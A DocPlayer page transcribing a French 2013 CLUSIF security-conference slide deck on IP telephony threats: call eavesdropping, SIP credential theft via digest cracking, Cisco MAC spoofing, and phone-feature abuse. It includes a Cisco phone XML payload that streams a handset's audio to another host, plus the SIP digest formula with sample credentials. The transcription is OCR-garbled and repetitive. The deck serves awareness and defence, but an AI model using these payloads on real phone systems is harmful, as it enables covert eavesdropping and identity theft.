Les *menaces en image*

Documents pareils
Configuration du driver SIP dans ALERT

La VoIP: Les protocoles SIP, SCCP et H323. Jonathan BRIFFAUT Alexandre MARTIN

Etat des lieux sur la sécurité de la VoIP

Voix sur IP. Généralités. Paramètres. IPv4 H323 / SIP. Matériel constructeur. Asterisk

Configuration du driver SIP dans ALERT. V2

LABO TELEPHONIE. Etude et réalisation de la Téléphonie sur IP (VoIP) avec Cisco Call Manager et Asterisk

Labo 1 - CUCME - Appels simples

Travaux pratiques Configuration d une carte réseau pour qu elle utilise DHCP dans Windows Vista

SIP A. Aoun - La Visioconférence SIP - 1

VOIP. QoS SIP TOPOLOGIE DU RÉSEAU

Offre de stage. Un(e) stagiaire en informatique

SIP. Sommaire. Internet Multimédia

La VoIP et ToIP. - Les constructeurs de réseaux : Anciens : Alcatel, Ericsson, Nortel, Siemens, Lucent, NEC Nouveaux venus : NetCentrex, Cirpack

VoIP et "NAT" VoIP et "NAT" 1/ La Traduction d'adresse réseau. 1/ La traduction d'adresse réseau. 1/ La traduction d'adresse réseau

La sécurité des PABX IP. Panorama des risques et introduction des mesures de protection

La ToIP/VoIP. Voix et téléphonie sur IP - Convergence voix et données

VOIP : Un exemple en Afrique

TP 2 : ANALYSE DE TRAMES VOIP

IMPLEMENTATION D UN IPBX AVEC MESSAGERIE UNIFIEE

La VOIP :Les protocoles H.323 et SIP

Documentation support technique

Déploiement sécuritaire de la téléphonie IP

Juillet Fax sur IP & Virtualisation

Exemples d'intrusion sur les réseaux VoIP

Réunion du 1er Avril VoIP : théorie et réalité opérationnelle. info@ipercom.com

VoIP : Introduction à la sécurité. VoIP : Introduction à la sécurité

La qualité de service (QoS)

LA VoIP LES PRINCIPES

Bilan UREC et résultat de quelques tests

Configuration d'un serveur DHCP Windows 2000 pour Cisco CallManager

Observer. Un outil adapté à la VoIP

Architectures de déploiement de la VoIP/SIP

SYSTEMES ELECTRONIQUES NUMERIQUES

Nerim Trunk SIP Mai 2013

PROJET TRIBOX-2012-A

Téléphonie Cisco. - CME Manager Express = Logiciel dans un routeur, version simplifiée du call manager.

ENREGISTREUR DE COMMUNICATIONS

Liste de vérification des exigences Flexfone

L'écoute des conversations VoIP

Voix sur IP Étude d approfondissement Réseaux

Extended communication server 4.1 : VoIP SIP service- Administration

Configuration O.box Table des matières

VoIP et sécurité. Retour d'expérience d'audits de sécurité. 6 avril Hervé Schauer CISSP, ProCSSI, ISO Lead Auditor <Herve.Schauer@hsc.

ROUTEURS CISCO, PERFECTIONNEMENT

Entreprise Aujourd hui

Mise en œuvre et résultats des tests de transfert de la voix sur le Protocole Internet V.o.I.P

La Voix sur IP OLIVIER D.

C a h p a i p tre e 4 Archi h t i ectur u e e t S i S g i n g a n li l s i atio i n o n SI S P

Catalogue des formations 2015

Couche Session M1 Info Z. Mammeri - UPS 1. Concept de session

Concept Compumatica Secure Mobile

Asterisk pour la visioconférence en enseignement à distance. SAGBO Kouessi Arafat Romaric Contact:

Skype (v2.5) Protocol Data Structures (French) Author : Ouanilo MEDEGAN

VoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3)

Documentation : Réseau

Note de première mise en service. Passerelle ipro-04n. TTPMSiPRO04N R1.0 fr

Nicolas Christophe Sahut - LinuxDays.ch - 8 au 12 mai Genève 1

VoIP/ToIP Etude de cas

Solutions réseaux pour. la Voix sur IP (VoIP)

téléphonie VOIP La téléphonie via les réseaux LAN Installation d'un serveur téléphonique IP et configuration Clients IPBX Asterisk / Trixbox

ManageEngine VQManager connaître la qualité de la voix

! 1 /! 5 TD - MIP + RO - NEMO. 1. Mobile IP (MIPv6) avec optimisation de routage

Introduction de la Voix sur IP

Passerelle VoIP pour PBX

Jean-Louis Cech descente des Princes des Baux Orange Orange : 20 juin 2014.

VoIP et sécurité. Retour d'expérience d'audits de sécurité. 7 juillet 2006

Menaces et sécurité préventive

Comment change t-on la musique d attente sur l IPBX LKY SPA9000 Linksys? On charge de son PC une musique d attente au format MPEG3, WAV, Midi

Notice d installation et d utilisation SIP PBX 100

Gregory DENIS. Nicolas MENECEUR. pour le California Institute of Technology Ciren 2010

Du monde TDM à la ToIP

Appliance FAST360 Technical Overview. Sécurité de la VoIP. Copyright 2008 ARKOON Network Security

Le cas ci-dessous est celui d une grande administration belge : l Administration de la Province de Luxembourg.

SIP. Plan. Introduction Architecture SIP Messages SIP Exemples d établissement de session Enregistrement

TR2 : Technologies de l'internet. Chapitre VII. Serveur DHCP Bootp Protocole, Bail Relais DHCP

Mise en place d un système de Téléphonie sur IP basé sur le logiciel Asterisk

Term Professionnelle Micro informatique & Réseaux Installation et Maintenance Lycée Saint Joseph Vannes

Autorité de Régulation de la Poste et des Télécommunications. Direction de l Interconnexion et des Nouvelles Technologies.

VoIP ( H323,SIP) et sécurits. curité. Kamel HJAIEJ SUP COM

Configuration Alcatel OmniPCX Office (OXO) OpenIP OpenVoice

Guide de configuration de la Voix sur IP

Téléphone IP. Téléphone IP aux nombreuses fonctions avancées pour une utilisation professionnelle et au prix abordable FICHE PRODUIT

Cisco Certified Network Associate

TRIXBOX. Tutorial et fonctions avancées

Telephony over IP by.

Mise en place de la Téléphonie sur IP au U6

AC PRO SEN TR module «téléphonie»

Stéphanie Lacerte. Document technique. Connextek. 31 mai Cloudtel

Utimaco LIMS. Interception légale de services de télécommunications

Expérience pilote de ToIP sur RAP

DESCRIPTIF DE MODULE S5 ERT

Les Failles/Attaques de La VoiP. Sécurisation d'un Réseau VoiP. Conclusion

Dr Rim Belhassine-Cherif Directeur de Développement de Produits et Services.

Moyens de Communication Voix : Présentation et Enjeux de Sécurité

Partie 2 (Service de téléphonie simple) :

Le routeur de la Freebox explications et configuration

7.1.2 Normes des réseaux locaux sans fil

Bac Pro SEN Académie de Versailles Etablissement Ampere Morsang sur orge Session 20XX SYSTÈMES ÉLECTRONIQUES NUMÉRIQUES

Yann BECHET 32 ans 8 ans d expérience yann@bechet.org

Réseaux TP4 Voix sur IP et Qualité de service. Partie 1. Mise en place du réseau et vérification de la connectivité

Transcription:

Les *menaces en image* Joffrey CZARNY - EADS IW CLUSIF > PABX IP et la sécurité 25 Avril 2013

Les menaces abordées aujourd hui Ecoute des communica>ons téléphoniques Manipula>on des flux de signalisa>on v SCCP (redirecfon d appels) v SIP (vol d idenffiant) Ecoute des échanges téléphoniques externes Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC Abus des fonc>onnalités d un téléphone IP 2

Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3

Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3

Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3

Ecoute des communica>ons téléphoniques Les Flux voix (RTP) non chiffrés permetent de faire de l écoute. 3

ManipulaFon des flux de signalisafon 5

manipulafon des flux de signalisafon Python Skinny class from Scapy # Station - > Callmanager 0x0000: "SkinnyMessageKeepAlive", 0x0001: "SkinnyMessageRegister", 0x0002: "SkinnyMessageIpPort", 0x0003: "SkinnyMessageKeypadButton", 0x0004: "SkinnyMessageEnblocCall", 0x0005: "SkinnyMessageStimulus", 0x0006: "SkinnyMessageOffHook", 0x0007: "SkinnyMessageOnHook", 0x0008: "SkinnyMessageHookFlash", 0x0009: "SkinnyMessageForwardStatReq", 0x000A: "SkinnyMessageSpeedDialStatReq", 0x000B: "SkinnyMessageLineStatReq", 0x000C: "SkinnyMessageConfigStatReq", 0x000D: "SkinnyMessageTimeDateReq", 0x000E: "SkinnyMessageButtonTemplateReq", 0x000F: "SkinnyMessageVersionReq", 0x0010: "SkinnyMessageCapabilitiesRes", 0x0011: "SkinnyMessageMediaPortList", 0x0012: "SkinnyMessageServerReq, 5

manipulafon des flux de signalisafon CLUSIF > Conférence > Lieu Date 5

Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP INVITE 200 OK 7

Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP BYE 200 OK 8

Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP BYE 407 Challenge 9

Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP 10

Manipula>on des flux de signalisa>on: vol d iden>fiant de connexion SIP HA1 = MD5(username:realm:password) HA2 = MD5(method:digestURI) response = MD5(HA1:nonce:HA2) >>> username='100' >>> realm='asterisk' >>> password='test' >>> method='register' >>> uri='sip:10.100.100.127' 11

Ecoute des échanges téléphoniques externes Les passerelles VoIP ne sont pas de simple routeur Les flux de signalisa>on et voix ne sont quasiment jamais chiffrés par rapport au flux interne à l éco système VoIP. Les protocoles de signalisa>on sur les passerelles VoIP n u>lisent pas d iden>fiants 12

Ecoute des échanges téléphoniques externe 13

Ecoute des échanges téléphoniques externe 14

Ecoute des échanges téléphoniques externe 15

Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC Les téléphones VoIP Cisco utilisent la MAC@ comme identifiant. Avec un émulateur de téléphone VoIP Cisco, il est possible d usurper l identité d une personne au sein de l éco système VoIP. 16

Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC 17

Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC 18

Vol d iden>té via le vol d iden>fiant de connexion SIP ou via l usurpa>on d adresse MAC 18

Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19

Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19

Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19

Abus des fonc>onnalités d un téléphone IP Prise de contrôle du téléphone à distance via Extension Mobility Mise en écoute d un téléphone via les commandes URI: RTP[R/T]x <CiscoIPPhoneExecute><ExecuteItemPriority=\"0\"URL=\"".RTPTx:10.100.100.250:32000."\"/></CiscoIPPhoneExecute> 19

20

20

QuesFons / Responses Allo?? Quoi t as pas sécurisé ton infra VoIP?? Allo?? 21

2024 © DocPlayer.fr Politique de confidentialité | Conditions de service | Feed-back